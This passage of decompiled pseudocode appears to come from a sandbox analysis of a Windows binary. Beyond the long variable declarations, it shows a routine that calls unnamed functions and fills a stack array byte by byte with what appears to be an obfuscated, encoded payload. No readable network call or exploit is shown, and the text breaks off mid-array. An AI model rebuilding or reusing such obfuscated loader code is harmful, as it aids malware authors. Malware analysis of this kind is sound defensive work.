                                                                                                        				char _v2005;
                                                                                                        				char _v2006;
                                                                                                        				char _v2007;
                                                                                                        				char _v2008;
                                                                                                        				char _v2009;
                                                                                                        				char _v2010;
                                                                                                        				char _v2011;
                                                                                                        				char _v2012;
                                                                                                        				char _v2013;
                                                                                                        				char _v2014;
                                                                                                        				char _v2015;
                                                                                                        				char _v2016;
                                                                                                        				char _v2017;
                                                                                                        				char _v2018;
                                                                                                        				char _v2019;
                                                                                                        				char _v2020;
                                                                                                        				char _v2021;
                                                                                                        				char _v2022;
                                                                                                        				char _v2023;
                                                                                                        				char _v2024;
                                                                                                        				char _v2025;
                                                                                                        				char _v2026;
                                                                                                        				char _v2027;
                                                                                                        				char _v2028;
                                                                                                        				char _v2029;
                                                                                                        				char _v2030;
                                                                                                        				char _v2031;
                                                                                                        				char _v2032;
                                                                                                        				char _v2033;
                                                                                                        				char _v2034;
                                                                                                        				char _v2035;
                                                                                                        				char _v2036;
                                                                                                        				char _v2037;
                                                                                                        				char _v2038;
                                                                                                        				char _v2039;
                                                                                                        				char _v2040;
                                                                                                        				char _v2041;
                                                                                                        				char _v2042;
                                                                                                        				char _v2043;
                                                                                                        				char _v2044;
                                                                                                        				char _v2045;
                                                                                                        				char _v2046;
                                                                                                        				char _v2047;
                                                                                                        				char _v2048;
                                                                                                        				char _v2049;
                                                                                                        				char _v2050;
                                                                                                        				char _v2051;
                                                                                                        				char _v2052;
                                                                                                        				char _v2053;
                                                                                                        				char _v2054;
                                                                                                        				char _v2055;
                                                                                                        				char _v2056;
                                                                                                        				char _v2057;
                                                                                                        				char _v2058;
                                                                                                        				char _v2059;
                                                                                                        				char _v2060;
                                                                                                        				char _v2061;
                                                                                                        				char _v2062;
                                                                                                        				char _v2063;
                                                                                                        				char _v2064;
                                                                                                        				char _v2065;
                                                                                                        				char _v2066;
                                                                                                        				char _v2067;
                                                                                                        				char _v2068;
                                                                                                        				char _v2069;
                                                                                                        				char _v2070;
                                                                                                        				char _v2071;
                                                                                                        				char _v2072;
                                                                                                        				char _v2073;
                                                                                                        				char _v2074;
                                                                                                        				char _v2075;
                                                                                                        				char _v2076;
                                                                                                        				char _v2077;
                                                                                                        				char _v2078;
                                                                                                        				char _v2079;
                                                                                                        				char _v2080;
                                                                                                        				char _v2081;
                                                                                                        				char _v2082;
                                                                                                        				char _v2083;
                                                                                                        				char _v2084;
                                                                                                        				char _v2085;
                                                                                                        				char _v2086;
                                                                                                        				char _v2087;
                                                                                                        				char _v2088;
                                                                                                        				char _v2089;
                                                                                                        				char _v2090;
                                                                                                        				char _v2091;
                                                                                                        				char _v2092;
                                                                                                        				char _v2093;
                                                                                                        				char _v2094;
                                                                                                        				char _v2095;
                                                                                                        				char _v2096;
                                                                                                        				char _v2097;
                                                                                                        				char _v2098;
                                                                                                        				char _v2099;
                                                                                                        				char _v2100;
                                                                                                        				char _v2101;
                                                                                                        				char _v2102;
                                                                                                        				char _v2103;
                                                                                                        				char _v2104;
                                                                                                        				char _v2105;
                                                                                                        				char _v2106;
                                                                                                        				char _v2107;
                                                                                                        				char _v2108;
                                                                                                        				char _v2109;
                                                                                                        				char _v2110;
                                                                                                        				char _v2111;
                                                                                                        				char _v2112;
                                                                                                        				char _v2113;
                                                                                                        				char _v2114;
                                                                                                        				char _v2115;
                                                                                                        				char _v2116;
                                                                                                        				char _v2117;
                                                                                                        				char _v2118;
                                                                                                        				char _v2119;
                                                                                                        				char _v2120;
                                                                                                        				char _v2121;
                                                                                                        				char _v2122;
                                                                                                        				char _v2123;
                                                                                                        				char _v2124;
                                                                                                        				char _v2125;
                                                                                                        				char _v2126;
                                                                                                        				char _v2127;
                                                                                                        				char _v2128;
                                                                                                        				char _v2129;
                                                                                                        				char _v2130;
                                                                                                        				char _v2131;
                                                                                                        				char _v2132;
                                                                                                        				char _v2133;
                                                                                                        				char _v2134;
                                                                                                        				char _v2135;
                                                                                                        				char _v2136;
                                                                                                        				char _v2137;
                                                                                                        				char _v2138;
                                                                                                        				char _v2139;
                                                                                                        				char _v2140;
                                                                                                        				char _v2141;
                                                                                                        				char _v2142;
                                                                                                        				char _v2143;
                                                                                                        				char _v2144;
                                                                                                        				char _v2145;
                                                                                                        				char _v2146;
                                                                                                        				char _v2147;
                                                                                                        				char _v2148;
                                                                                                        				char _v2149;
                                                                                                        				char _v2150;
                                                                                                        				char _v2151;
                                                                                                        				char _v2152;
                                                                                                        				char _v2153;
                                                                                                        				char _v2154;
                                                                                                        				char _v2155;
                                                                                                        				char _v2156;
                                                                                                        				char _v2157;
                                                                                                        				char _v2158;
                                                                                                        				char _v2159;
                                                                                                        				char _v2160;
                                                                                                        				char _v2161;
                                                                                                        				char _v2162;
                                                                                                        				char _v2163;
                                                                                                        				char _v2164;
                                                                                                        				char _v2165;
                                                                                                        				char _v2166;
                                                                                                        				char _v2167;
                                                                                                        				char _v2168;
                                                                                                        				char _v2169;
                                                                                                        				char _v2170;
                                                                                                        				char _v2171;
                                                                                                        				char _v2172;
                                                                                                        				char _v2173;
                                                                                                        				char _v2174;
                                                                                                        				char _v2175;
                                                                                                        				char _v2176;
                                                                                                        				char _v2177;
                                                                                                        				char _v2178;
                                                                                                        				char _v2179;
                                                                                                        				char _v2180;
                                                                                                        				char _v2181;
                                                                                                        				char _v2182;
                                                                                                        				char _v2183;
                                                                                                        				char _v2184;
                                                                                                        				char _v2185;
                                                                                                        				char _v2186;
                                                                                                        				char _v2187;
                                                                                                        				char _v2188;
                                                                                                        				char _v2189;
                                                                                                        				char _v2190;
                                                                                                        				char _v2191;
                                                                                                        				char _v2192;
                                                                                                        				char _v2193;
                                                                                                        				char _v2194;
                                                                                                        				char _v2195;
                                                                                                        				char _v2196;
                                                                                                        				char _v2197;
                                                                                                        				char _v2198;
                                                                                                        				char _v2199;
                                                                                                        				char _v2200;
                                                                                                        				char _v2201;
                                                                                                        				char _v2202;
                                                                                                        				char _v2203;
                                                                                                        				char _v2204;
                                                                                                        				char _v2205;
                                                                                                        				char _v2206;
                                                                                                        				char _v2207;
                                                                                                        				char _v2208;
                                                                                                        				char _v2209;
                                                                                                        				char _v2210;
                                                                                                        				char _v2211;
                                                                                                        				char _v2212;
                                                                                                        				char _v2213;
                                                                                                        				char _v2214;
                                                                                                        				char _v2215;
                                                                                                        				char _v2216;
                                                                                                        				char _v2217;
                                                                                                        				char _v2218;
                                                                                                        				char _v2219;
                                                                                                        				char _v2220;
                                                                                                        				char _v2221;
                                                                                                        				char _v2222;
                                                                                                        				char _v2223;
                                                                                                        				char _v2224;
                                                                                                        				char _v2225;
                                                                                                        				char _v2226;
                                                                                                        				char _v2227;
                                                                                                        				char _v2228;
                                                                                                        				char _v2229;
                                                                                                        				char _v2230;
                                                                                                        				char _v2231;
                                                                                                        				char _v2232;
                                                                                                        				char _v2233;
                                                                                                        				char _v2234;
                                                                                                        				char _v2235;
                                                                                                        				char _v2236;
                                                                                                        				char _v2237;
                                                                                                        				char _v2238;
                                                                                                        				char _v2239;
                                                                                                        				char _v2240;
                                                                                                        				char _v2241;
                                                                                                        				char _v2242;
                                                                                                        				char _v2243;
                                                                                                        				char _v2244;
                                                                                                        				char _v2245;
                                                                                                        				char _v2246;
                                                                                                        				char _v2247;
                                                                                                        				char _v2248;
                                                                                                        				char _v2249;
                                                                                                        				char _v2250;
                                                                                                        				char _v2251;
                                                                                                        				char _v2252;
                                                                                                        				char _v2253;
                                                                                                        				char _v2254;
                                                                                                        				char _v2255;
                                                                                                        				char _v2256;
                                                                                                        				char _v2257;
                                                                                                        				char _v2258;
                                                                                                        				char _v2259;
                                                                                                        				char _v2260;
                                                                                                        				char _v2261;
                                                                                                        				char _v2262;
                                                                                                        				char _v2263;
                                                                                                        				char _v2264;
                                                                                                        				char _v2265;
                                                                                                        				char _v2266;
                                                                                                        				char _v2267;
                                                                                                        				char _v2268;
                                                                                                        				char _v2269;
                                                                                                        				char _v2270;
                                                                                                        				char _v2271;
                                                                                                        				char _v2272;
                                                                                                        				char _v2273;
                                                                                                        				char _v2274;
                                                                                                        				char _v2275;
                                                                                                        				char _v2276;
                                                                                                        				char _v2277;
                                                                                                        				char _v2278;
                                                                                                        				char _v2279;
                                                                                                        				char _v2280;
                                                                                                        				char _v2281;
                                                                                                        				char _v2282;
                                                                                                        				char _v2283;
                                                                                                        				char _v2284;
                                                                                                        				char _v2285;
                                                                                                        				char _v2286;
                                                                                                        				char _v2287;
                                                                                                        				char _v2288;
                                                                                                        				char _v2289;
                                                                                                        				char _v2290;
                                                                                                        				char _v2291;
                                                                                                        				char _v2292;
                                                                                                        				char _v2293;
                                                                                                        				char _v2294;
                                                                                                        				char _v2295;
                                                                                                        				char _v2296;
                                                                                                        				char _v2297;
                                                                                                        				char _v2298;
                                                                                                        				char _v2299;
                                                                                                        				char _v2300;
                                                                                                        				char _v2301;
                                                                                                        				char _v2302;
                                                                                                        				char _v2303;
                                                                                                        				char _v2304;
                                                                                                        				char _v2305;
                                                                                                        				char _v2306;
                                                                                                        				char _v2307;
                                                                                                        				char _v2308;
                                                                                                        				char _v2309;
                                                                                                        				char _v2310;
                                                                                                        				char _v2311;
                                                                                                        				char _v2312;
                                                                                                        				char _v2313;
                                                                                                        				char _v2314;
                                                                                                        				char _v2315;
                                                                                                        				char _v2316;
                                                                                                        				char _v2317;
                                                                                                        				char _v2318;
                                                                                                        				char _v2319;
                                                                                                        				char _v2320;
                                                                                                        				char _v2321;
                                                                                                        				char _v2322;
                                                                                                        				char _v2323;
                                                                                                        				char _v2324;
                                                                                                        				char _v2325;
                                                                                                        				char _v2326;
                                                                                                        				char _v2327;
                                                                                                        				char _v2328;
                                                                                                        				char _v2329;
                                                                                                        				char _v2330;
                                                                                                        				char _v2331;
                                                                                                        				char _v2332;
                                                                                                        				char _v2333;
                                                                                                        				char _v2334;
                                                                                                        				char _v2335;
                                                                                                        				char _v2336;
                                                                                                        				char _v2337;
                                                                                                        				char _v2338;
                                                                                                        				char _v2339;
                                                                                                        				char _v2340;
                                                                                                        				char _v2341;
                                                                                                        				char _v2342;
                                                                                                        				char _v2343;
                                                                                                        				char _v2344;
                                                                                                        				char _v2345;
                                                                                                        				char _v2346;
                                                                                                        				char _v2347;
                                                                                                        				char _v2348;
                                                                                                        				char _v2349;
                                                                                                        				char _v2350;
                                                                                                        				char _v2351;
                                                                                                        				char _v2352;
                                                                                                        				char _v2353;
                                                                                                        				char _v2354;
                                                                                                        				char _v2355;
                                                                                                        				char _v2356;
                                                                                                        				char _v2357;
                                                                                                        				char _v2358;
                                                                                                        				char _v2359;
                                                                                                        				char _v2360;
                                                                                                        				char _v2361;
                                                                                                        				char _v2362;
                                                                                                        				char _v2363;
                                                                                                        				char _v2364;
                                                                                                        				char _v2365;
                                                                                                        				char _v2366;
                                                                                                        				char _v2367;
                                                                                                        				char _v2368;
                                                                                                        				char _v2369;
                                                                                                        				char _v2370;
                                                                                                        				char _v2371;
                                                                                                        				char _v2372;
                                                                                                        				char _v2373;
                                                                                                        				char _v2374;
                                                                                                        				char _v2375;
                                                                                                        				char _v2376;
                                                                                                        				char _v2377;
                                                                                                        				char _v2378;
                                                                                                        				char _v2379;
                                                                                                        				char _v2380;
                                                                                                        				char _v2381;
                                                                                                        				char _v2382;
                                                                                                        				char _v2383;
                                                                                                        				char _v2384;
                                                                                                        				char _v2385;
                                                                                                        				char _v2386;
                                                                                                        				char _v2387;
                                                                                                        				char _v2388;
                                                                                                        				char _v2389;
                                                                                                        				char _v2390;
                                                                                                        				char _v2391;
                                                                                                        				char _v2392;
                                                                                                        				char _v2393;
                                                                                                        				char _v2394;
                                                                                                        				char _v2395;
                                                                                                        				char _v2396;
                                                                                                        				char _v2397;
                                                                                                        				char _v2398;
                                                                                                        				char _v2399;
                                                                                                        				char _v2400;
                                                                                                        				char _v2401;
                                                                                                        				char _v2402;
                                                                                                        				char _v2403;
                                                                                                        				char _v2404;
                                                                                                        				char _v2405;
                                                                                                        				char _v2406;
                                                                                                        				char _v2407;
                                                                                                        				char _v2408;
                                                                                                        				char _v2409;
                                                                                                        				char _v2410;
                                                                                                        				char _v2411;
                                                                                                        				char _v2412;
                                                                                                        				char _v2413;
                                                                                                        				char _v2414;
                                                                                                        				char _v2415;
                                                                                                        				char _v2416;
                                                                                                        				char _v2417;
                                                                                                        				char _v2418;
                                                                                                        				char _v2419;
                                                                                                        				char _v2420;
                                                                                                        				char _v2421;
                                                                                                        				char _v2422;
                                                                                                        				char _v2423;
                                                                                                        				char _v2424;
                                                                                                        				char _v2425;
                                                                                                        				char _v2426;
                                                                                                        				char _v2427;
                                                                                                        				char _v2428;
                                                                                                        				char _v2429;
                                                                                                        				char _v2430;
                                                                                                        				char _v2431;
                                                                                                        				char _v2432;
                                                                                                        				char _v2433;
                                                                                                        				char _v2434;
                                                                                                        				char _v2435;
                                                                                                        				char _v2436;
                                                                                                        				char _v2437;
                                                                                                        				char _v2438;
                                                                                                        				char _v2439;
                                                                                                        				char _v2440;
                                                                                                        				char _v2441;
                                                                                                        				char _v2442;
                                                                                                        				char _v2443;
                                                                                                        				char _v2444;
                                                                                                        				char _v2445;
                                                                                                        				char _v2446;
                                                                                                        				char _v2447;
                                                                                                        				char _v2448;
                                                                                                        				char _v2449;
                                                                                                        				char _v2450;
                                                                                                        				char _v2451;
                                                                                                        				char _v2452;
                                                                                                        				char _v2453;
                                                                                                        				char _v2454;
                                                                                                        				char _v2455;
                                                                                                        				char _v2456;
                                                                                                        				char _v2457;
                                                                                                        				char _v2458;
                                                                                                        				char _v2459;
                                                                                                        				char _v2460;
                                                                                                        				char _v2461;
                                                                                                        				char _v2462;
                                                                                                        				char _v2463;
                                                                                                        				char _v2464;
                                                                                                        				char _v2465;
                                                                                                        				char _v2466;
                                                                                                        				char _v2467;
                                                                                                        				char _v2468;
                                                                                                        				char _v2469;
                                                                                                        				char _v2470;
                                                                                                        				char _v2471;
                                                                                                        				char _v2472;
                                                                                                        				char _v2473;
                                                                                                        				char _v2474;
                                                                                                        				char _v2475;
                                                                                                        				char _v2476;
                                                                                                        				char _v2477;
                                                                                                        				char _v2478;
                                                                                                        				char _v2479;
                                                                                                        				char _v2480;
                                                                                                        				char _v2481;
                                                                                                        				char _v2482;
                                                                                                        				char _v2483;
                                                                                                        				char _v2484;
                                                                                                        				char _v2485;
                                                                                                        				char _v2486;
                                                                                                        				char _v2487;
                                                                                                        				char _v2488;
                                                                                                        				char _v2489;
                                                                                                        				char _v2490;
                                                                                                        				char _v2491;
                                                                                                        				char _v2492;
                                                                                                        				char _v2493;
                                                                                                        				char _v2494;
                                                                                                        				char _v2495;
                                                                                                        				char _v2496;
                                                                                                        				char _v2497;
                                                                                                        				char _v2498;
                                                                                                        				char _v2499;
                                                                                                        				char _v2500;
                                                                                                        				char _v2501;
                                                                                                        				char _v2502;
                                                                                                        				char _v2503;
                                                                                                        				char _v2504;
                                                                                                        				char _v2505;
                                                                                                        				char _v2506;
                                                                                                        				char _v2507;
                                                                                                        				char _v2508;
                                                                                                        				char _v2509;
                                                                                                        				char _v2510;
                                                                                                        				char _v2511;
                                                                                                        				char _v2512;
                                                                                                        				char _v2513;
                                                                                                        				char _v2514;
                                                                                                        				char _v2515;
                                                                                                        				char _v2516;
                                                                                                        				char _v2517;
                                                                                                        				char _v2518;
                                                                                                        				char _v2519;
                                                                                                        				char _v2520;
                                                                                                        				char _v2521;
                                                                                                        				char _v2522;
                                                                                                        				char _v2523;
                                                                                                        				char _v2524;
                                                                                                        				char _v2525;
                                                                                                        				char _v2526;
                                                                                                        				char _v2527;
                                                                                                        				char _v2528;
                                                                                                        				char _v2529;
                                                                                                        				char _v2530;
                                                                                                        				char _v2531;
                                                                                                        				char _v2532;
                                                                                                        				char _v2533;
                                                                                                        				char _v2534;
                                                                                                        				char _v2535;
                                                                                                        				char _v2536;
                                                                                                        				char _v2537;
                                                                                                        				char _v2538;
                                                                                                        				char _v2539;
                                                                                                        				char _v2540;
                                                                                                        				char _v2541;
                                                                                                        				char _v2542;
                                                                                                        				char _v2543;
                                                                                                        				char _v2544;
                                                                                                        				char _v2545;
                                                                                                        				char _v2546;
                                                                                                        				char _v2547;
                                                                                                        				char _v2548;
                                                                                                        				char _v2549;
                                                                                                        				char _v2550;
                                                                                                        				char _v2551;
                                                                                                        				char _v2552;
                                                                                                        				char _v2553;
                                                                                                        				char _v2554;
                                                                                                        				char _v2555;
                                                                                                        				char _v2556;
                                                                                                        				char _v2557;
                                                                                                        				char _v2558;
                                                                                                        				char _v2559;
                                                                                                        				char _v2560;
                                                                                                        				char _v2561;
                                                                                                        				char _v2562;
                                                                                                        				char _v2563;
                                                                                                        				char _v2564;
                                                                                                        				char _v2565;
                                                                                                        				char _v2566;
                                                                                                        				char _v2567;
                                                                                                        				char _v2568;
                                                                                                        				char _v2569;
                                                                                                        				char _v2570;
                                                                                                        				char _v2571;
                                                                                                        				char _v2572;
                                                                                                        				char _v2573;
                                                                                                        				char _v2574;
                                                                                                        				char _v2575;
                                                                                                        				char _v2576;
                                                                                                        				char _v2577;
                                                                                                        				char _v2578;
                                                                                                        				char _v2579;
                                                                                                        				char _v2580;
                                                                                                        				char _v2581;
                                                                                                        				char _v2582;
                                                                                                        				char _v2583;
                                                                                                        				char _v2584;
                                                                                                        				char _v2585;
                                                                                                        				char _v2586;
                                                                                                        				char _v2587;
                                                                                                        				char _v2588;
                                                                                                        				char _v2589;
                                                                                                        				char _v2590;
                                                                                                        				char _v2591;
                                                                                                        				char _v2592;
                                                                                                        				char _v2593;
                                                                                                        				char _v2594;
                                                                                                        				char _v2595;
                                                                                                        				char _v2596;
                                                                                                        				char _v2597;
                                                                                                        				char _v2598;
                                                                                                        				char _v2599;
                                                                                                        				char _v2600;
                                                                                                        				char _v2601;
                                                                                                        				char _v2602;
                                                                                                        				char _v2603;
                                                                                                        				char _v2604;
                                                                                                        				char _v2605;
                                                                                                        				char _v2606;
                                                                                                        				char _v2607;
                                                                                                        				char _v2608;
                                                                                                        				char _v2609;
                                                                                                        				char _v2610;
                                                                                                        				char _v2611;
                                                                                                        				char _v2612;
                                                                                                        				char _v2613;
                                                                                                        				char _v2614;
                                                                                                        				char _v2615;
                                                                                                        				char _v2616;
                                                                                                        				char _v2617;
                                                                                                        				char _v2618;
                                                                                                        				char _v2619;
                                                                                                        				char _v2620;
                                                                                                        				char _v2621;
                                                                                                        				char _v2622;
                                                                                                        				char _v2623;
                                                                                                        				char _v2624;
                                                                                                        				char _v2625;
                                                                                                        				char _v2626;
                                                                                                        				char _v2627;
                                                                                                        				char _v2628;
                                                                                                        				char _v2629;
                                                                                                        				char _v2630;
                                                                                                        				char _v2631;
                                                                                                        				char _v2632;
                                                                                                        				char _v2672;
                                                                                                        				char _v2704;
                                                                                                        				void* _v2736;
                                                                                                        				char _v2752;
                                                                                                        				signed long long _v2760;
                                                                                                        				long long _v2768;
                                                                                                        				char _v2776;
                                                                                                        				signed int _v2780;
                                                                                                        				intOrPtr _v2784;
                                                                                                        				signed long long _v2792;
                                                                                                        				signed char _v2796;
                                                                                                        				signed char _v2800;
                                                                                                        				signed char _v2804;
                                                                                                        				signed char _v2808;
                                                                                                        				signed int _t2669;
                                                                                                        				signed long long _t2714;
                                                                                                        				signed long long _t2715;
                                                                                                        				long long _t2716;
                                                                                                        				signed long long _t2748;
                                                                                                        
                                                                                                        				_t2746 = __rdi;
                                                                                                        				_t2703 = __edi;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t2714 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				_t2715 = _t2714 ^ _t2748;
                                                                                                        				_v24 = _t2715;
                                                                                                        				_v2784 = _a16;
                                                                                                        				if (_v2784 == 1) goto 0x28913fee;
                                                                                                        				goto 0x289193e5;
                                                                                                        				_v2796 = 0;
                                                                                                        				_v2800 = 0;
                                                                                                        				_v2768 = 0;
                                                                                                        				_v2792 = 0;
                                                                                                        				E00007FFC7FFC289097DC(_a16, __rcx); // executed
                                                                                                        				_v2792 = _t2715;
                                                                                                        				if (_v2792 == 0) goto 0x28914039;
                                                                                                        				r8d = 0x5f5e100;
                                                                                                        				E00007FFC7FFC28906920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
                                                                                                        				E00007FFC7FFC289093A8(_t2715, __rbx, _v2792, __rsi); // executed
                                                                                                        				 *0x2897ea20 = 0;
                                                                                                        				 *0x2897ea14 = 0;
                                                                                                        				 *0x2897ea24 = 0;
                                                                                                        				 *0x2897ea18 = 0;
                                                                                                        				 *0x2897ea1c = 0;
                                                                                                        				 *0x2897ea10 = 0;
                                                                                                        				_v2632 = 0x62;
                                                                                                        				_v2631 = 0xfa;
                                                                                                        				_v2630 = 0x28;
                                                                                                        				_v2629 = 0x18;
                                                                                                        				_v2628 = 0x56;
                                                                                                        				_v2627 = 0x18;
                                                                                                        				_v2626 = 0x3d;
                                                                                                        				_v2625 = 0x31;
                                                                                                        				_v2624 = 0x39;
                                                                                                        				_v2623 = 0x13;
                                                                                                        				_v2622 = 0x33;
                                                                                                        				_v2621 = 9;
                                                                                                        				_v2620 = 5;
                                                                                                        				_v2619 = 0x64;
                                                                                                        				_v2618 = 0x18;
                                                                                                        				_v2617 = 0x2d;
                                                                                                        				_v2616 = 0x39;
                                                                                                        				_v2615 = 0x32;
                                                                                                        				_v2614 = 0xae;
                                                                                                        				_v2613 = 0x33;
                                                                                                        				_v2612 = 2;
                                                                                                        				_v2611 = 0xdc;
                                                                                                        				_v2610 = 0xf;
                                                                                                        				_v2609 = 0xd9;
                                                                                                        				_v2608 = 0x8a;
                                                                                                        				_v2607 = 0x2c;
                                                                                                        				_v2606 = 0x45;
                                                                                                        				_v2605 = 0x26;
                                                                                                        				_v2604 = 0x3c;
                                                                                                        				_v2603 = 0x60;
                                                                                                        				_v2602 = 0x69;
                                                                                                        				_v2601 = 0xdb;
                                                                                                        				_v2600 = 0x9e;
                                                                                                        				_v2599 = 0x2e;
                                                                                                        				_v2598 = 0xd5;
                                                                                                        				_v2597 = 0x26;
                                                                                                        				_v2596 = 0x26;
                                                                                                        				_v2595 = 0x30;
                                                                                                        				_v2594 = 0x3f;
                                                                                                        				_v2593 = 0x22;
                                                                                                        				_v2592 = 0xe6;
                                                                                                        				_v2591 = 0xce;
                                                                                                        				_v2590 = 0x3c;
                                                                                                        				_v2589 = 0xe6;
                                                                                                        				_v2588 = 0x4c;
                                                                                                        				_v2587 = 0xd5;
                                                                                                        				_v2586 = 0xb9;
                                                                                                        				_v2585 = 0x39;
                                                                                                        				_v2584 = 0xef;
                                                                                                        				_v2583 = 0xdb;
                                                                                                        				_v2582 = 0x81;
                                                                                                        				_v2581 = 0x12;
                                                                                                        				_v2580 = 0xc4;
                                                                                                        				_v2579 = 0xb;
                                                                                                        				_v2578 = 0xd7;
                                                                                                        				_v2577 = 0x22;
                                                                                                        				_v2576 = 0xdb;
                                                                                                        				_v2575 = 2;
                                                                                                        				_v2574 = 0xb8;
                                                                                                        				_v2573 = 0x15;
                                                                                                        				_v2572 = 0xa8;
                                                                                                        				_v2571 = 2;
                                                                                                        				_v2570 = 0x48;
                                                                                                        				_v2569 = 0xb;
                                                                                                        				_v2568 = 0x36;
                                                                                                        				_v2567 = 0xaa;
                                                                                                        				_v2566 = 0x3a;
                                                                                                        				_v2565 = 0xde;
                                                                                                        				_v2564 = 0x30;
                                                                                                        				_v2563 = 0xcf;
                                                                                                        				_v2562 = 0x15;
                                                                                                        				_v2561 = 0xca;
                                                                                                        				_v2560 = 0x30;
                                                                                                        				_v2559 = 0xcc;
                                                                                                        				_v2558 = 0x6b;
                                                                                                        				_v2557 = 0xae;
                                                                                                        				_v2556 = 0x69;
                                                                                                        				_v2555 = 0xd3;
                                                                                                        				_v2554 = 0x5a;
                                                                                                        				_v2553 = 0xb1;
                                                                                                        				_v2552 = 0x27;
                                                                                                        				_v2551 = 0xe4;
                                                                                                        				_v2550 = 0x28;
                                                                                                        				_v2549 = 0xf6;
                                                                                                        				_v2548 = 0x19;
                                                                                                        				_v2547 = 0xb6;
                                                                                                        				_v2546 = 0xf;
                                                                                                        				_v2545 = 0x65;
                                                                                                        				_v2544 = 0x7b;
                                                                                                        				_v2543 = 0xf9;
                                                                                                        				_v2542 = 0xa;
                                                                                                        				_v2541 = 0x3d;
                                                                                                        				_v2540 = 0x71;
                                                                                                        				_v2539 = 0x89;
                                                                                                        				_v2538 = 0x4e;
                                                                                                        				_v2537 = 0x57;
                                                                                                        				_v2536 = 0x40;
                                                                                                        				_v2535 = 0xfb;
                                                                                                        				_v2534 = 0x1b;
                                                                                                        				_v2533 = 0xf1;
                                                                                                        				_v2532 = 0x1c;
                                                                                                        				_v2531 = 0x67;
                                                                                                        				_v2530 = 0;
                                                                                                        				_v2529 = 0x52;
                                                                                                        				_v2528 = 0xa0;
                                                                                                        				_v2527 = 0xd;
                                                                                                        				_v2526 = 0x90;
                                                                                                        				_v2525 = 0x40;
                                                                                                        				_v2524 = 0x4e;
                                                                                                        				_v2523 = 0;
                                                                                                        				_v2522 = 0x6e;
                                                                                                        				_v2521 = 0xbd;
                                                                                                        				_v2520 = 0x66;
                                                                                                        				_v2519 = 0x9b;
                                                                                                        				_v2518 = 0x15;
                                                                                                        				_v2517 = 0x74;
                                                                                                        				_v2516 = 0x75;
                                                                                                        				_v2515 = 0x58;
                                                                                                        				_v2514 = 0xa1;
                                                                                                        				_v2513 = 0x31;
                                                                                                        				_v2512 = 0x8c;
                                                                                                        				_v2511 = 8;
                                                                                                        				_v2510 = 0x3c;
                                                                                                        				_v2509 = 0x41;
                                                                                                        				_v2508 = 0x5a;
                                                                                                        				_v2507 = 0xf8;
                                                                                                        				_v2506 = 0x1c;
                                                                                                        				_v2505 = 0xa7;
                                                                                                        				_v2504 = 1;
                                                                                                        				_v2503 = 0x4d;
                                                                                                        				_v2502 = 0x4a;
                                                                                                        				_v2501 = 0x55;
                                                                                                        				_v2500 = 0xf8;
                                                                                                        				_v2499 = 0xef;
                                                                                                        				_v2498 = 0xd5;
                                                                                                        				_v2497 = 0x3f;
                                                                                                        				_v2496 = 0x70;
                                                                                                        				_v2495 = 0x6f;
                                                                                                        				_v2494 = 0x7a;
                                                                                                        				_v2493 = 0x59;
                                                                                                        				_v2492 = 0x65;
                                                                                                        				_v2491 = 0x4f;
                                                                                                        				_v2490 = 0xb5;
                                                                                                        				_v2489 = 0xe1;
                                                                                                        				_v2488 = 0x80;
                                                                                                        				_v2487 = 0x5e;
                                                                                                        				_v2486 = 0x4d;
                                                                                                        				_v2485 = 0x6e;
                                                                                                        				_v2484 = 0x17;
                                                                                                        				_v2483 = 0xa9;
                                                                                                        				_v2482 = 0x16;
                                                                                                        				_v2481 = 0x43;
                                                                                                        				_v2480 = 0;
                                                                                                        				_v2479 = 0x1c;
                                                                                                        				_v2478 = 0x4a;
                                                                                                        				_v2477 = 0x2f;
                                                                                                        				_v2476 = 8;
                                                                                                        				_v2475 = 0xa9;
                                                                                                        				_v2474 = 0x3e;
                                                                                                        				_v2473 = 7;
                                                                                                        				_v2472 = 0x13;
                                                                                                        				_v2471 = 0x6a;
                                                                                                        				_v2470 = 0x1d;
                                                                                                        				_v2469 = 0x25;
                                                                                                        				_v2468 = 0x2a;
                                                                                                        				_v2467 = 0xa1;
                                                                                                        				_v2466 = 0x30;
                                                                                                        				_v2465 = 0x60;
                                                                                                        				_v2464 = 0x76;
                                                                                                        				_v2463 = 0x5d;
                                                                                                        				_v2462 = 0x57;
                                                                                                        				_v2461 = 0x23;
                                                                                                        				_v2460 = 0x7e;
                                                                                                        				_v2459 = 0x9e;
                                                                                                        				_v2458 = 0x2f;
                                                                                                        				_v2457 = 0x49;
                                                                                                        				_v2456 = 0x75;
                                                                                                        				_v2455 = 0x70;
                                                                                                        				_v2454 = 0x3c;
                                                                                                        				_v2453 = 0x4d;
                                                                                                        				_v2452 = 0x1e;
                                                                                                        				_v2451 = 0xaa;
                                                                                                        				_v2450 = 0x7b;
                                                                                                        				_v2449 = 0x54;
                                                                                                        				_v2448 = 0x53;
                                                                                                        				_v2447 = 0x5c;
                                                                                                        				_v2446 = 0x54;
                                                                                                        				_v2445 = 0x6c;
                                                                                                        				_v2444 = 0x6b;
                                                                                                        				_v2443 = 0xb4;
                                                                                                        				_v2442 = 0x20;
                                                                                                        				_v2441 = 0x18;
                                                                                                        				_v2440 = 0x1e;
                                                                                                        				_v2439 = 0x21;
                                                                                                        				_v2438 = 2;
                                                                                                        				_v2437 = 8;
                                                                                                        				_v2436 = 0xd;
                                                                                                        				_v2435 = 0x95;
                                                                                                        				_v2434 = 0x23;
                                                                                                        				_v2433 = 0x6c;
                                                                                                        				_v2432 = 8;
                                                                                                        				_v2431 = 0x73;
                                                                                                        				_v2430 = 0x27;
                                                                                                        				_v2429 = 0x1e;
                                                                                                        				_v2428 = 0x1a;
                                                                                                        				_v2427 = 0xbd;
                                                                                                        				_v2426 = 0x67;
                                                                                                        				_v2425 = 0x7b;
                                                                                                        				_v2424 = 0x7a;
                                                                                                        				_v2423 = 1;
                                                                                                        				_v2422 = 0x26;
                                                                                                        				_v2421 = 0x34;
                                                                                                        				_v2420 = 0x36;
                                                                                                        				_v2419 = 0xb3;
                                                                                                        				_v2418 = 0;
                                                                                                        				_v2417 = 2;
                                                                                                        				_v2416 = 0x5c;
                                                                                                        				_v2415 = 0x57;
                                                                                                        				_v2414 = 0x35;
                                                                                                        				_v2413 = 0x4b;
                                                                                                        				_v2412 = 0x3c;
                                                                                                        				_v2411 = 0xd;
                                                                                                        				_v2410 = 0xaa;
                                                                                                        				_v2409 = 9;
                                                                                                        				_v2408 = 2;
